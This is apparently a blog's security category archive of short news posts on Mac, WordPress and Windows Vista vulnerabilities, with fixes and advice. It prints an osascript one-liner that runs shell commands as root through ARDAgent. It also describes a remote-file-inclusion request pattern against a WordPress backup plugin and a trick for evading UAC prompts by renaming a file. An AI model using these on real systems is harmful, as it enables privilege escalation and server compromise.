Category Archives: Security

First Trojan Based on ARDAgent Root Exploit

Secure Mac are reporting that they have found a trojan designed to take advantage of the ARDAgent root exploit that I posted about previously.

The Trojan dubbed “AppleScript.THT” allows the remote attacker full access to the system, steals usernames and passwords, hides by turning off system logging, opening firewall ports and can also be used to install key logging software, take pictures using the inbuilt iSight and to enable file sharing.

The Trojan come as either a compiled AppleScript titled ASthtv05 or as a disc image called ASthtv_06. In both cases, the files have to be downloaded and executed by the user. At the moment, the Trojan does not take advantage of any other Mac vulnerabilities to automatically infect new machines – but that’s probably only a matter of time.

Secure Mac are advising Mac users to use MacScan to protect themselves against the threat. Or you could just stop the ARDAgent service from running scripts as root.

Temporary Fix for ARDAgent Root Privilege Escalation

If you’re worried about the security problem with Apples Remote Desktop Sharing that I posted about yesterday, but still want to use the service, then here’s a quick solution:

Open Terminal and type, all on one line, the following command:

sudo chmod u-s /System/Library/CoreServices/RemoteManagement/
ArdAgent.app/Contents/MacOS/ARDAgent

Now if you use,
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'you should get your own username back.

Mac OS X – Gain Root Privileges Through AppleScript

A serious security hole has been found in Mac OS X – both Leopard and Tiger are affected. The exploit allows someone with physical access to a Mac to run programs as the Root user.

The exploit uses the Apple Remote Desktop, (ARDAgent), application to execute a shell script. When the shell script is executed it is done so as Root. To test this, type the following command in Terminal:

osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

This command works even if Remote Desktop Sharing is disabled and the Root user is disabled in the Directory Utility. However, it will only work if the user is logged into the computer. It will not work if Fast User Switching has been used.

As this is a brand new exploit there is no fix as of yet.

BackUpWordPress Plugin Security Issue

Over the last few days I’ve been noticing quite a few hits on my blog for various, non-existant pages. Each of these hits takes the form of:

bkpwp_plugin_path=URL of a text file on an another website

Checking the URL in the page request returns a text file containing PHP code that attempts to launch a remote shell.

The first part of the page request is a reference to a plugin for WordPress called BackUpWordPress This plugin automatically backs up your WordPress database and files. According to Security Focus, the plugin does not properly check user provided input, thereby allowing remote users to possibly access your hosting providers server.

At this point in time there is no update available to resolve this issue. If you’re using this plugin, then until a fix is made available, the safest option is to deactivate and remove the plugin.

Update: Since I wrote this piece, the BackUpWordPress plugin has been updated to fix this issue. Kudos to the developer for releasing a fix so quickly. More details in this comment.

ATI Driver Flaw Exposes Vista Kernel to Attack

Security researchers have discovered a flaw with an ATI driver that allows unsigned and potentially dangerous code to be installed and loaded into the Vista kernel.

In order to increase security and to protect against attack, Microsoft have introduced a new driver signing requirement in Vista. By requiring that drivers are signed, Microsoft hoped that this would ensure that only drivers which were verified as being clean and compatible with Vista could be installed.

ATI duly had their drivers signed by VeriSign so that they could be installed on a Windows Vista system. Unfortunately, their was a flaw in one of the drivers. Apparently the flaw was originally intended as a shortcut in the driver that allowed ATI developers to load modules into the driver for testing. When the driver was released, either no-one thought to remove the shortcut or ATI forgot about it.

In order to close the hole, ATI will have to patch the flaw in their driver, have it signed with a new certificate, roll-out the update via Windows Update, then have the original signing authority revoke the original certificate. It’s not a straightforward process and it’s by no means foolproof either.

Another Way to Subvert Windows

Symantec have released details of another possible way to subvert Windows, more specifically through the Background Intelligent Transfer Service (BITS).

BITS is used by Windows Update to automatically download updates in the background and by Microsoft Messenger to transfer files. The fault lies in the fact that BITS bypasses any installed firewalls, and does not require any suspicious actions to start the download. By using BITS, an attacker could automatically download whatever they wanted to your computer, including password/ credit card logging software, remote access control software, the possibilities are endless.

While there are no major infections using this method, it is just a matter of time before one does come along. Hopefully, Microsoft will have addressed the issue before that happens.

Program Names Matter on Windows Vista

One of the selling points of Windows Vista is it’s increased security. User Account Control, (UAC), is designed to ensure that unknown programs aren’t launched without the users express permission. The idea is sound, but the actual implementation may be off.

The Register reports that the name of the program has a major bearing on whether or not UAC asks the user to authenticate the installation. If the program is named “install.exe” for example, then Vista will require that the program have admin rights and UAC will prompt the user to cancel or allow installation. However, if the program name does not contain any references to “install”, “update” or “uninstall” then Vista will happily let it run without user intervention, even though it is the exact same program.

Microsoft responded that Vista was designed to automatically detect install, update and uninstall programs. As these types of programs generally need to write to protected areas of the registry and system files, then Vista would prompt for admin rights to be assigned to the program.

While Vista may have been designed to detect these type of programs, it seems that all it is doing is checking the program name, otherwise renaming the program would not allow the program to run without UAC prompting the user. While this type of behaviour may offer a modicum of protection, it can be sidestepped by using an innocuous file name. The big question now is how long will it take for malware authors to use this to bypass UAC and get their programs on to a Vista machine?

Problems with Realtek HD Audio Control Panel

I recently wrote about a vulnerability in the way that Windows handles animated cursors, and that Microsoft were releasing a patch for the problem. I downloaded and installed the patch yesterday, and discovered that it didn’t like my sound card all that much.

My HP desktop has a Realtek sound card, and the patch that MS released prevents the control panel for the sound card from loading, with the following error message:

The system DLL user32.dll was relocated in memory. The application will not run properly. The relocation occurred because the DLL C:WindowsSystem32Hhctrl.ocx occupied an address range reserved for Windows system DLLs. The vendor supplying the DLL should be contacted for a new DLL.

Fortunately, there is a fix available form Microsoft, available under KB 935448